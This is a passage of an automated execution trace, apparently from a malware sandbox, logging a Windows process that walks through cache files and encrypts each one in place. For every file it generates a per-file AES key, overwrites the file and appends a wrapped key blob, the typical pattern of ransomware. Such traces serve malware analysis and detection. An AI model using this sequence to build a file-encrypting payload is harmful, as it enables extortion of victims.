dwFreeType=0x8000) returned 1 [0146.616] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.616] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.616] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.616] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.616] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", dwFileAttributes=0x80) returned 1 [0146.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.617] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0146.617] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0146.617] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.617] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.618] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.618] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.618] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.618] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.618] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0146.618] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.618] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.618] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.618] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.619] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.619] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.619] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.619] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.619] CloseHandle (hObject=0x198) returned 1 [0146.643] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.647] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.647] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.647] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.647] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", dwFileAttributes=0x80) returned 1 [0146.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.648] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0146.648] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0146.648] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.648] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.649] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.649] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.649] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.649] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.649] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0146.649] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.649] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.650] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.650] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.650] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.650] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.650] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.650] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.650] CloseHandle (hObject=0x198) returned 1 [0146.667] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.673] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.673] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.673] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", dwFileAttributes=0x80) returned 1 [0146.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.674] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0146.674] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0146.674] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.674] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.675] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.675] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.675] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.675] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.675] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0146.675] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.675] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.676] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.676] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.676] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.676] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.676] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.676] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.676] CloseHandle (hObject=0x198) returned 1 [0146.707] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.712] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.712] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.712] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", dwFileAttributes=0x80) returned 1 [0146.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.713] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0146.713] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0146.713] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.713] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.714] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.714] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.714] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.714] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.714] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0146.714] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.714] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.714] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.714] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.714] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.714] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.714] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.714] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.715] CloseHandle (hObject=0x198) returned 1 [0146.732] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.736] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.737] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.737] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", dwFileAttributes=0x80) returned 1 [0146.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.748] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0146.748] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0146.748] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.748] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.749] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.749] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.749] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.749] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.749] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0146.749] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.749] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.749] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.749] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.749] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.750] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.750] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.750] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.750] CloseHandle (hObject=0x198) returned 1 [0146.771] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.775] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.775] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.775] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", dwFileAttributes=0x80) returned 1 [0146.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.776] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0146.776] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0146.776] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.776] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.776] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.777] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.777] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.777] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.777] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0146.777] CryptEncrypt (in: hKey=0x3b8690, 